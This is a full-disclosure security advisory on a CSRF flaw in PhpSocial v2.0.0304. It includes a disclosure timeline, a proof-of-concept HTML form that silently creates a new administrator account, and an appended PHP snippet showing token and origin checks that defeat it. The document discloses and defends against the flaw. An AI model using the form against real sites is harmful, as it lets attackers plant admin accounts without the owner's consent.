Security Advisory - Curesec Research Team

1. Introduction

Affected Product:     PhpSocial v2.0.0304_20222226
Fixed in:             not fixed
Fixed Version Link:   n/a
Vendor Website:       http://phpsocial.net
Vulnerability Type:   CSRF
Remote Exploitable:   Yes
Reported to vendor:   11/21/2015
Disclosed to public:  12/21/2015
Release mode:         Full Disclosure
CVE:                  n/a
Credits:              Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description
PhpSocial is social networking software written in PHP. Version v2.0.0304 has no CSRF protection, which means that an attacker can perform actions on behalf of a victim if the victim visits an attacker-controlled site while logged in.

3. Proof of Concept

Add a new admin:

<html>
  <body>
    <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
      <input type="hidden" name="admin_username" value="admin2" />
      <input type="hidden" name="admin_password" value="admin" />
      <input type="hidden" name="admin_password_confirm" value="admin" />
      <input type="hidden" name="admin_name" value="admin2" />
      <input type="hidden" name="admin_email" value="admin2@example.com" />
      <input type="hidden" name="task" value="addadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/2015  Contacted Vendor (no reply)
12/10/2015  Tried to remind vendor (no email is given, security@phpsocial.net does
            not exist, and contact form could not be used because the website is down)
12/21/2015  Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html

--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
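Since the vendor shipped no fix, the following is an added example (not PhpSocial or Curesec code) of the synchronizer-token check that would stop the admin-creation request above from succeeding cross-site; the handler name admin_add_handler and the csrf_token field name are assumptions, and the snippet is meant to be included at the top of a session-protected admin script.

```php
<?php
// Added example, not PhpSocial's code: synchronizer-token CSRF protection for
// a state-changing admin action such as task=addadmin. Function names and the
// csrf_token field name are assumptions for illustration.
declare(strict_types=1);

session_start();

// Issue one random token per session and embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for the form. A cross-site page cannot read the victim's
// session, so it cannot supply this value; the browser's cookie alone is not enough.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Constant-time comparison of the submitted token against the session token.
function csrf_valid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Defence in depth: a cross-origin POST carries an Origin (or Referer) header
// naming the attacker's site. A missing header is treated as a failure here.
function same_origin(array $server): bool
{
    $origin   = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $ownHost  = explode(':', $server['HTTP_HOST'] ?? '')[0];
    return $ownHost !== '' && parse_url($origin, PHP_URL_HOST) === $ownHost;
}

// Guard for the admin endpoint: reject and log before any admin row is written.
function admin_add_handler(array $post, array $server): void
{
    if (!same_origin($server) || !csrf_valid($post)) {
        http_response_code(403);
        error_log('CSRF check failed for addadmin from ' . ($server['REMOTE_ADDR'] ?? '?'));
        exit('Invalid request');
    }
    // ... the original addadmin logic runs only after both checks pass ...
}
```

The PoC form in section 3 fails both checks: it carries no csrf_token field and its Origin header names the attacker's site rather than the PhpSocial host.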